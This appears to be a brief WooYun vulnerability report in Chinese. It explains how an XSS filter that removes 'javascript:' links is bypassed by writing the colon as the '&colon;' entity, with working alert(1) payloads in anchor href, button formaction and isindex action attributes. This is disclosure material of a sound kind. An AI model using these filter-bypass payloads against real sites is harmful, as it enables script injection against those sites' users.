WooYun.org

虽然对很多标签很多事件以及属性都作了比较严格的过滤，但在处理类似于javascript:alert(1)这一类的伪协议payload时，由于过滤不严格导致fiter bypass.
如果我们的payload是:
<a href="javascript:alert(1)" target="_blank">test2</a>
filter就会自动删除href="javascript:alert(1)"部分。
但如果对“:”进行实体编码，像这样:
<a href="javascript&colon;alert(1)" target="_blank">test2</a>
就可以轻松bypass filter了。
当然同样的例子，还有很多。比如说:
<form><button formaction=javascript&colon;alert(1)>CLICKME
<isindex action=javascript&colon;alert(1) type=image>
没有用到on*事件，却依然可以结合实体编码绕过，在action和formaction中触发xss